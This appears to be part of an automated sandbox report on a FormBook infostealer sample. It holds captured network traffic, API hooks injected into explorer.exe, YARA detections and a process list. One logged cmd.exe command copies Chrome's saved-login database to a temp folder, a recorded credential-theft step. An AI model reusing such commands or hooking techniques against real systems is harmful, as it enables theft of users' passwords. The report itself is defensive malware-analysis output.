                                    Data Raw: 33 66 3d 6a 62 34 78 69 49 4f 4b 5a 70 65 5f 78 4f 74 6a 68 33 65 46 34 43 36 44 41 76 39 66 38 39 45 69 74 7a 74 6e 33 30 7a 66 35 36 55 4e 58 5a 46 34 76 76 41 36 51 30 58 30 78 68 77 46 65 73 45 6f 4f 7a 41 42 6d 32 63 6f 65 2d 31 2d 52 70 7e 79 55 6b 4c 78 7a 46 75 4b 55 57 67 78 6f 31 4b 33 47 4c 66 68 31 49 4f 72 43 49 77 36 6f 2d 43 62 70 46 37 71 72 61 38 52 4f 6e 72 70 72 77 6f 68 78 35 68 31 7e 30 34 41 50 5a 63 6c 35 55 67 42 46 71 33 6b 6d 51 48 36 36 74 4b 61 51 69 37 77 78 6c 4b 4f 4b 68 45 52 75 4b 71 65 4a 67 35 31 6a 6c 50 55 49 4a 74 64 4f 4e 41 63 52 6d 65 68 61 41 58 67 33 69 47 6b 4c 6b 31 62 35 49 77 6e 50 34 43 74 41 4c 58 4e 48 59 7a 72 44 68 4d 53 33 49 76 57 61 68 55 6d 44 47 4e 74 43 33 79 75 72 78 4f 74 41 52 71 51 32 5a 4f 37 72 37 58 68 44 44 47 4c 28 59 6b 53 55 49 75 6e 56 6d 49 34 28 50 59 36 75 66 61 66 57 35 46 74 47 54 52 72 7e 56 51 33 48 30 62 46 6f 57 4f 76 55 53 32 63 5a 43 52 34 59 52 62 5f 6c 35 70 38 4c 7a 72 73 68 42 39 6b 28 56 7e 64 32 42 42 43 63 57 35 6f 63 37 76 2d 71 4e 73 46 73 30 49 62 73 2d 37 66 72 79 6d 77 75 42 68 7a 39 79 4c 43 70 39 35 37 78 44 41 49 67 39 66 68 45 47 70 2d 4e 5a 7a 70 74 48 43 71 56 32 63 51 44 67 48 42 6b 66 39 6a 4f 70 33 72 59 6c 51 62 77 79 62 76 30 7a 75 46 56 4b 32 59 42 74 67 2d 69 34 72 30 72 45 73 53 49 36 32 4f 48 48 6f 35 54 52 31 41 39 77 6c 34 49 50 76 39 54 46 54 64 4e 36 58 31 75 33 72 4a 63 52 32 4d 6c 6d 4c 78 65 59 74 73 28 36 6a 55 7a 45 37 6c 59 45 6b 2d 4c 6f 42 47 54 32 7a 77 37 47 6e 57 38 45 74 53 39 2d 4a 69 38 6e 41 56 76 75 35 78 71 70 44 62 73 79 68 41 35 77 71 72 56 54 77 68 7a 34 4a 71 4d 37 66 77 6b 6b 55 31 30 33 38 42 73 56 30 41 73 68 33 5f 58 67 64 4a 57 66 47 30 33 35 77 33 67 70 79 42 53 48 64 33 4d 32 32 42 47 4a 39 30 6d 38 78 79 62 46 4d 35 73 57 74 53 69 5a 53 4b 76 63 4e 44 39 45 72 79 31 5a 6f 6d 78 79 55 52 71 4d 6f 41 6b 4c 76 4b 79 34 59 58 5a 49 4d 57 4a 53 6b 75 67 4a 55 4d 37 32 39 67 30 75 47 55 
45 50 35 31 68 6a 28 76 58 6d 4e 55 4e 53 45 2d 52 35 45 43 69 36 4b 4f 42 64 50 6f 53 4a 64 30 61 47 35 61 6e 61 4d 46 31 58 77 46 31 6f 50 54 62 38 42 62 36 62 49 55 79 51 71 59 35 69 76 4a 6c 62 79 56 7a 49 58 4d 64 50 4a 42 39 36 49 77 35 56 30 72 66 35 62 44 6e 59 68 34 72 53 37 4c 38 4a 5a 36 6f 30 63 33 6c 31 70 33 74 38 73 53 7a 39 54 4b 33 4e 62 43 43 31 32 7a 4d 34 62 72 68 63 51 48 35 33 70 64 55 51 62 4d 74 67 62 56 52 36 6c 6b 72 61 6d 5a 46 71 6d 79 71 48 76 48 32 67 37 55 61 57 46 4e 55 6a 64 59 6c 49 30 37 32 64 58 6b 71 5f 75 75 55 7a 69 41 4a 71 7e 46 4e 64 38 39 52 45 52 68 46 39 4f 73 72 4c 63 4e 5a 52 53 6e 78 76 6f 6c 68 6f 65 52 52 6c 39 61 52 77 28 30 49 58 64 33 28 58 63 33 4f 71 51 4a 4d 31 43 6d 39 44 6a 64 69 4d 41 72 57 55 52 62 46 69 69 70 75 52 63 59 47 4e 50 69 71 4f 44 78 5a 68 67 59 39 4f 4f 68 42 37 70 41 48 78 59 50 35 63 59 5f 4c 4c 35 49 51 54 65 54 5a 52 62 44 45 5a 39 45 43 4a 57 75 7a 50 55 75 74 53 30 71 36 4f 4e 58 45 56 34 4c 55 54 44 4c 4a 52 57 33 28 43 6d 58 64 48 6b 54 4c 69 56 75 33 54 55 61 41 35 47 4c 4c 71 76 73 72 45 44 75 6a 5f 56 6e 6f 4a 34 31 55 46 43 65 44 70 6a 6c 48 34 66 39 74 2d 43 51 46 68 69 59 62 4f 31 5a 6e 54 50 5a 37 41 30 6d 6b 57 6e 74 54 45 6e 48 4e 4f 49 59 59 64 68 43 6b 32 61 4e 6e 4d 6e 78 56 38 62 6e 44 72 72 65 77 38 57 4b 49 47 6a 50 36 76 5a 68 32 63 6a 2d 30 4f 33 38 70 41 55 32 51 51 62 43 50 7a 66 4f 76 30 48 76 41 76 62 45 67 65 4c 79 46 78 6b 7a 39 62 6b 55 54 31 58 65 53 49 28 31 62 56 66 70 7a 42 6d 6b 32 52 73 42 72 56 39 32 57 78 4a 49 46 46 42 63 6e 46 31 33 4a 54 59 32 4d 33 74 54 52 53 37 67 37 49 48 51 63 50 64 68 68 76 5a 6b 6f 69 47 39 32 37 68 30 7e 72 34 4e 62 31 45 50 48 45 32 69 49 73 79 44 4c 43 36 64 31 39 30 71 35 51 46 44 6e 38 31 66 55 65 5a 71 6b 59 74 37 50 45 6e 74 4e 6e 4e 57 32 74 49 39 6a 38 51 57 56 4e 47 42 32 75 45 6d 66 79 46 31 71 39 57 31 76 59 61 50 64 52 34 69 7a 30 30 58 37 65 39 6a 45 71 63 79 67 5a 35 30 36 6c 6b 6b 39 7a 63 64 69 30 76 45 34 77 
7e 6f 45 37 62 48 56 69 74 64 70 70 6a 52 33 31 4a 53 4c 6e 28 6b 6a 45 37 38 35 44 7a 49 39 45 51 42 51 54 64 57 53 61 77 67 4b 4b 63 5f
                                    Data Ascii: 3f=jb4xiIOKZpe_xOtjh3eF4C6DAv9f89Eitztn30zf56UNXZF4vvA6Q0X0xhwFesEoOzABm2coe-1-Rp~yUkLxzFuKUWgxo1K3GLfh1IOrCIw6o-CbpF7qra8ROnrprwohx5h1~04APZcl5UgBFq3kmQH66tKaQi7wxlKOKhERuKqeJg51jlPUIJtdONAcRmehaAXg3iGkLk1b5IwnP4CtALXNHYzrDhMS3IvWahUmDGNtC3yurxOtARqQ2ZO7r7XhDDGL(YkSUIunVmI4(PY6ufafW5FtGTRr~VQ3H0bFoWOvUS2cZCR4YRb_l5p8LzrshB9k(V~d2BBCcW5oc7v-qNsFs0Ibs-7frymwuBhz9yLCp957xDAIg9fhEGp-NZzptHCqV2cQDgHBkf9jOp3rYlQbwybv0zuFVK2YBtg-i4r0rEsSI62OHHo5TR1A9wl4IPv9TFTdN6X1u3rJcR2MlmLxeYts(6jUzE7lYEk-LoBGT2zw7GnW8EtS9-Ji8nAVvu5xqpDbsyhA5wqrVTwhz4JqM7fwkkU1038BsV0Ash3_XgdJWfG035w3gpyBSHd3M22BGJ90m8xybFM5sWtSiZSKvcND9Ery1ZomxyURqMoAkLvKy4YXZIMWJSkugJUM729g0uGUEP51hj(vXmNUNSE-R5ECi6KOBdPoSJd0aG5anaMF1XwF1oPTb8Bb6bIUyQqY5ivJlbyVzIXMdPJB96Iw5V0rf5bDnYh4rS7L8JZ6o0c3l1p3t8sSz9TK3NbCC12zM4brhcQH53pdUQbMtgbVR6lkramZFqmyqHvH2g7UaWFNUjdYlI072dXkq_uuUziAJq~FNd89RERhF9OsrLcNZRSnxvolhoeRRl9aRw(0IXd3(Xc3OqQJM1Cm9DjdiMArWURbFiipuRcYGNPiqODxZhgY9OOhB7pAHxYP5cY_LL5IQTeTZRbDEZ9ECJWuzPUutS0q6ONXEV4LUTDLJRW3(CmXdHkTLiVu3TUaA5GLLqvsrEDuj_VnoJ41UFCeDpjlH4f9t-CQFhiYbO1ZnTPZ7A0mkWntTEnHNOIYYdhCk2aNnMnxV8bnDrrew8WKIGjP6vZh2cj-0O38pAU2QQbCPzfOv0HvAvbEgeLyFxkz9bkUT1XeSI(1bVfpzBmk2RsBrV92WxJIFFBcnF13JTY2M3tTRS7g7IHQcPdhhvZkoiG927h0~r4Nb1EPHE2iIsyDLC6d190q5QFDn81fUeZqkYt7PEntNnNW2tI9j8QWVNGB2uEmfyF1q9W1vYaPdR4iz00X7e9jEqcygZ506lkk9zcdi0vE4w~oE7bHVitdppjR31JSLn(kjE785DzI9EQBQTdWSawgKKc_UdDOGW(0Fo2wP04Mj5xkekYL5aJWggmaq3YQE4hvW2kPXkj8sM7QCd9OGv6cyXfk1MkFeB9yIdX0~P3Edh8KLJ9GJN6kcXY6QtE00rYitd4TrckbVdlrXjnR6gJ7TQdJ(x5h8ZhKzOdo1BoKoc2Ke-oQLrMQKSaUjpseN7lDix2f9OuAPsZqxY1d2j1bhDfm1DfmnGrhhWGXkvjdU_Ot96DmA0iEivdy8SrzsI1v6uo4D4nXdvf1wLbNfGQzbxR8Bff6EDXHkgxt68fkpfp3SWux4u5GgV4T6zyUzoq3QX5WCbC3qSo2i3gr48Cg~hr8vXurnBpEgBjXzJQzShs2e_Qo7PbsRvVTV4QHUr978agX3k3Gruh1~WVkzCcyGJdgSsQq4qOoT2evEp5A5OPISTpqIWFzdt~UcxGTs7U-x2mJjsO80Bw61LMz6GxTqoCN6s1c2I~2hw8UqBpwULcbDWgxe5HrIAM6jDCOuPSAM9d040lA8n7Rw1WjXwmiHebp1mJEKCF9KzZWkTt8HBNsNHnAPk(1nUQ9nNdL7R75kjH3IHoIsup3GAAu8dcLvd1xIBzFvN8O6vhPA
2AvNAMJlz3MlCbVXLeU2Qd7T6xzRT1BAjznbZzD01VnK2qU~3GR3mSdlsCaT630HkkwIQqGW9zqdthDdn4oN7~_fm~jrjAQnI4Bqtd2sOqXNGmu(xNmpcSEW0N5yLhQb0uin_i8KBm8tMUaTf4bZ595lXmnlGd56p2R(DgHKFLo6KyBqkOMnUwNICbsHd4HLBmksISFtSWVTt9LFe2kzw6nRf7-21ZDbPvaj8KcpkCvgRURnO2nAWEh8_lA93YMcG0XUSStzdVd(YpOvDqTzMhxfGi3D8vSeTRXfTK70WtIF965yeFW1-2RuU7_SSTIPjEzU_QfJz6uASJB2n9FhB9XwVflwGOswGjzLGaLhwA03TjD(3WfvpyZGwNxhOAip43hzES3ZQxzWdXyzkPqWeinUTmuah8ytnwei6jdnIZG~VBc1A9hx2h94jKJFHeyuRD2mLAe3Pqb7yoyuwxwqhYKevOL926FIzUHraDtSqz2InBTV9w4pqwltrhtESdrK5niIdtkzSJARG~NbI1ijYT-Mplq9YaARkPRiyN6marIWF5sgasFFbEwi5tXqlbTd6Zrj8AnNPXBsA5WjWdH~lxqIvnh8ogV6s~5Gp~K48t-7BU-u32mbQDBi0LZTOKGShR4mTaNsgzzvQsUB9yJ9lA11cOj8JGyaJuE8BNZrdgCmznWslZHS0fRpDaDV6sCVYLwxeQglo7RFZtjJKUUX5iZOmaaacpCK2rriwZvLb0TKBts0uJQ7PN4Bf3CCMR1FWJLfNZEobRxpTdhG9nCqjI7a3o6XEQfXR41gpgo(H2Diwqz7pE6~XNE0fVa2iwmcvjX9qr8SDEGeybGp984sPimAdROfjNGmAz2Ijg7U1jQ4GGWBGqUAhTk82QwZ8eeZ-0cQ5SvDlmNtxRVqzx1lr2h3XTFAOkx(k03iAfEqGF5y7IQkSnyrGmH~YaSE3Y1L0u0J7hxcr37sOt5SGSzO30T5O9hvGe-SjQlW6p0oM91msU3i7g6OEafNHU99_3Hvof0NKYw4tWvmd0Otbok8ziUsJOWOO3ZD-v7D6PqhQk1eWuoZ0XcoghyjLNcYoXZIESgYN9WCqoovaKMmO5GYAnNn60btBxVm-7hyq27g2Kuum0Haf7N2JaZq_tZxypVPg7G3zVgQ95Mlre8FD3jZWi71ziQbdg0ufzZrvOh9k0Si60u(bGAmd136OJ5YPHwS2e4TCDTity-teoVzJbed9~mKSylGEmhmHd5fI8I6xvL99CrYrAZ3ZlIpc1VZvZBS5zeTANIa_BCBVgy1FnW2NR54Xtp4ALF~O0iNu9JLKfLxcdo3kDP39P_EPU-ZjVLKdQBpSp8GkLNZEtnPrrXS-ZPR56SL0wKuGANrApCXpjB~6gjUsDhmtj5rHBKy88-A7(j6yvu1ON-LGdNT3gqvNVkTd3tZFh1bkn4S7mc1V3rQp0mA83CUsv4OGoMqI2MaGvhs58psCY38ttJqXgeA1m6fGJbt_s0(ZCwmQ2yU2Bs9DZQcnTdh5X0RXvOthhvhQNujzoWdp592rpxTMe9Ia2_8_Ysp19mNjRXBAWod-rUVo~PCLVtRw68hda5DORkbV69FJ(JpsueGKAOGMUKFy9wj5NerrEgtUNzvjAPAXieDopu14qAKGGyIL8YHAPgALfdK-LNeKEuoGfZ5mSDmMsY~owl1VVgACmZkTa7AYusatE_OOibShu4jGFSjAsS75eVmysJwR30Z3cYMJ4Tx11TkzOSMQRnVN27P2eqgsjW3_emdDOj0GLSNxwngkG4XoGhUr43mhwQTv6uDh7Ua0SSN-8PzPr4Dhnb5eXtL_1-NWRzPpJQ9CDfP2OqqpI_S8aXNMPqb6CFdkUHrCtnyOXPFd(rnqmNqPqFP1SQxIEM27tSmgR-8G0M1sRbb0JgCmt2aQLhh6oww7pyGf4AxEDa(dYGVIHHPbx2nYNbjDfiayWgdmU-Zu(R26~An0bpW2pbzJHJfqB4n_cX0
I9UFcr95zzmNFYdWPa1tofljTaxLZho06GHNqnqHeRUKUvzJZpkcfNHs1tnKD08Ci3JGXYalaC0pS5vgKlc~qWacw3j1QbwZy14OnQobVSm7d1PILaNQixG0mWLl-17xG1f(c7
                                    May 14, 2022 11:56:07.207608938 CEST | 11132 | IN | HTTP/1.1 301 Moved Permanently
                                    Date: Sat, 14 May 2022 09:56:07 GMT
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Cache-Control: max-age=3600
                                    Expires: Sat, 14 May 2022 10:56:07 GMT
                                    Location: https://www.madurababe.net/p12s/
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4Vv%2FxHxLw6ASiG%2FDMjH0zkrN5D0gZNbe8Z8Pq%2FpY4vdAYqWdtwUe2dgBCxibKqEAZHZsEOF9TxwKGDsecH4pa9bokwciJAbmsQh1L0G2mXWnlkqgkAVeGh9CRXMT4yGTwxgGaWM%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Vary: Accept-Encoding
                                    Server: cloudflare
                                    CF-RAY: 70b2c318edbe8fee-FRA
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Code Manipulations

                                    Function Name | Hook Type | Active in Processes
                                    PeekMessageA | INLINE | explorer.exe
                                    PeekMessageW | INLINE | explorer.exe
                                    GetMessageW | INLINE | explorer.exe
                                    GetMessageA | INLINE | explorer.exe

                                    Function Name | Hook Type | New Data
                                    PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xE5
                                    PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xE5
                                    GetMessageW | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xE5
                                    GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xE5


                                    Target ID:0
                                    Start time:11:54:06
                                    Start date:14/05/2022
                                    Path:C:\Users\user\Desktop\PO#12108997.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\PO#12108997.exe"
                                    Imagebase:0xfb0000
                                    File size:655872 bytes
                                    MD5 hash:5F6801FB007EDE49A68943EF905B54C6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Target ID:4
                                    Start time:11:54:20
                                    Start date:14/05/2022
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                    Imagebase:0xf70000
                                    File size:2688096 bytes
                                    MD5 hash:B3A917344F5610BEEC562556F11300FA
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate

                                    Target ID:5
                                    Start time:11:54:23
                                    Start date:14/05/2022
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff6b8cf0000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    Target ID:17
                                    Start time:11:54:55
                                    Start date:14/05/2022
                                    Path:C:\Windows\SysWOW64\cmmon32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                    Imagebase:0xb20000
                                    File size:36864 bytes
                                    MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate

                                    Target ID:20
                                    Start time:11:55:09
                                    Start date:14/05/2022
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                    Imagebase:0xc20000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:22
                                    Start time:11:55:10
                                    Start date:14/05/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7c9170000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    No disassembly